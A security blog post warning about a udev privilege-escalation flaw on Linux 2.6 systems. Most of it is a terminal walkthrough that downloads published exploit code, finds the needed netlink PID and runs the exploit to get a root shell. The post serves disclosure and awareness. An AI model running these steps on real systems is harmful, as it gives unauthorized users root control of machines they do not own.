Mad Irish . net

Udev Exploit Allows Local Privilege Escalation

30 November -0001

A nasty new udev vulnerability is floating around in the wild that allows local users on Linux systems with udev and 2.6 kernels (2.6 is required for udev) to gain root privileges. Exploit code has been published and is quite easy to use. Secunia has an advisory at http://www.securityfocus.com/bid/34536 and a further discussion can be found at http://blog.cr0.org/2009/04/interesting-vulnerability-in-udevd.html.

The problem with this vulnerability is that any local user can use it to elevate to root. This means that if you have any malicious users, or any compromised accounts on your system, you could be at risk.

Downloading the exploit code is quite simple, you can grab it from http://seclists.org/fulldisclosure/2009/Apr/att-0198/udev_txt. Once you've downloaded the code put it in it's own directory to prevent confusion. Running it requires some experimentation as you have to provide the proper PID to the script in order for the code to work. An example follows: 

[asmith@teen-spirit ~]$ mkdir udev
[asmith@teen-spirit ~]$ cd udev
[asmith@teen-spirit udev]$ wget http://seclists.org/fulldisclosure/2009/Apr/att-                        0198/udev_txt
--15:58:25--  http://seclists.org/fulldisclosure/2009/Apr/att-0198/udev_txt
           => `udev_txt'
Resolving seclists.org... 64.13.134.50
Connecting to seclists.org|64.13.134.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,470 (3.4K) [text/plain]

100%[====================================>] 3,470         --.--K/s

15:58:26 (41.33 KB/s) - `udev_txt' saved [3470/3470]

[asmith@teen-spirit udev]$ ls
udev_txt
[asmith@teen-spirit udev]$ perl -i -pe 'chomp; print "\n";' udev_txt
[asmith@teen-spirit udev]$ chmod +x udev_txt
[asmith@teen-spirit udev]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfed0e00 0   0      00000000 0        0        00000000 2
c89d1a00 0   2617   00000111 0        0        00000000 2
cf87e200 6   0      00000000 0        0        00000000 2
cfafb000 7   2157   00000001 0        0        00000000 2
c135cc00 7   0      00000000 0        0        00000000 2
c13d3600 9   0      00000000 0        0        00000000 2
cf893000 10  0      00000000 0        0        00000000 2
cfed0c00 15  0      00000000 0        0        00000000 2
cfad5e00 15  553    ffffffff 0        0        00000000 2
c136d400 16  0      00000000 0        0        00000000 2

[asmith@teen-spirit udev]$ ./udev_txt 553
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# whoami
root
sh-3.1# ls
libno_ex.so.1.0  program.c  program.o  suid.c  udev.c  udev_txt
sh-3.1# ls /tmp
libno_ex.so.1.0  udev?                suid            udev

And you're root - it's just that simple (and scary).

Tags